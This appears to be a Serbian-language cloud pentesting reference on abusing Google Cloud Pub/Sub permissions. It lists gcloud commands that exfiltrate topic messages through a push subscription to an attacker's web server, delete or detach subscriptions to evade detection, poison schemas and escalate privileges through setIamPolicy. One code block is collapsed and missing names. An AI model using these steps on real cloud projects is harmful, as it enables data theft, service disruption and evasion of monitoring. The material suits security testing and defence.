Pub/Sub

Za više informacija o Pub/Sub-u pogledajte sledeću stranicu:

pubsub.topics.publish

Objavite poruku u temi, korisno za slanje neočekivanih podataka i pokretanje neočekivanih funkcionalnosti ili iskorišćavanje ranjivosti:

# Publish a message in a topic
gcloud pubsub topics publish <topic_name> --message "Hello!"

pubsub.topics.detachSubscription

Korisno je da se spreči primanje poruka na pretplatu, možda da bi se izbeglo otkrivanje.

gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>

pubsub.topics.delete

Korisno je da se spreči primanje poruka na pretplatu, možda da bi se izbeglo otkrivanje. Moguće je obrisati temu čak i ako su joj pridružene pretplate.

gcloud pubsub topics delete <TOPIC NAME>

pubsub.topics.update

Koristite ovu dozvolu da biste ažurirali neke postavke teme kako biste je poremetili, kao što su --clear-schema-settings, --message-retention-duration, --message-storage-policy-allowed-regions, --schema, --schema-project, --topic-encryption-key...

pubsub.topics.setIamPolicy

Dodelite sebi dozvolu da izvršite bilo koji od prethodnih napada.

pubsub.subscriptions.create,pubsub.topics.attachSubscription , (pubsub.subscriptions.consume)

Dobijte sve poruke na veb serveru:

# Crete push subscription and recieve all the messages instantly in your web server
gcloud pubsub subscriptions create <subscription name> --topic <topic name> --push-endpoint https://<URL to push to>

Kreirajte pretplatu i koristite je za izvlačenje poruka:

# This will retrive a non ACKed message (and won't ACK it)
gcloud pubsub subscriptions create <subscription name> --topic <topic_name>

# You also need pubsub.subscriptions.consume for this
gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
## This command will wait for a message to be posted

pubsub.subscriptions.delete

Brisanje pretplate može biti korisno za ometanje sistema za obradu logova ili nečeg sličnog:

gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>

pubsub.subscriptions.update

Koristite ovu dozvolu da biste ažurirali neka podešavanja tako da se poruke čuvaju na mestu koje možete pristupiti (URL, Big Query tabela, Bucket) ili samo da biste ga poremetili.

pubsub.subscriptions.setIamPolicy

Dodelite sebi dozvole potrebne za izvođenje bilo koje od prethodno komentarisanih napada.

pubsub.schemas.delete

Obrišite šemu kako biste mogli slati poruke koje ne ispunjavaju šemu:

gcloud pubsub schemas delete <SCHEMA NAME>

pubsub.schemas.attach, pubsub.topics.update,(pubsub.schemas.create)

Napadnite šemu na temu tako da poruke ne ispunjavaju uslove i time poremetite temu. Ako ne postoje šeme, možda ćete morati da kreirate jednu.

{
"namespace": "com.example",
"type": "record",
"name": "Person",
"fields": [
{
"name": "name",
"type": "string"
},
{
"name": "age",
"type": "int"
}
]
}

```bash # Attach new schema gcloud pubsub topics update projects//topics/ \ --schema=projects//schemas/ \ --message-encoding=json ``` ### `pubsub.schemas.setIamPolicy`

Dodelite sebi dozvole potrebne za izvršavanje bilo koje od prethodno komentarisanih napada.

pubsub.snapshots.create, pubsub.snapshots.seek

Ovo će kreirati snimak svih neACKovanih poruka i vratiti ih nazad na pretplatu. Nije baš korisno za napadača, ali evo ga:

gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \
--subscription=YOUR_SUBSCRIPTION_NAME
gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
--snapshot=YOUR_SNAPSHOT_NAME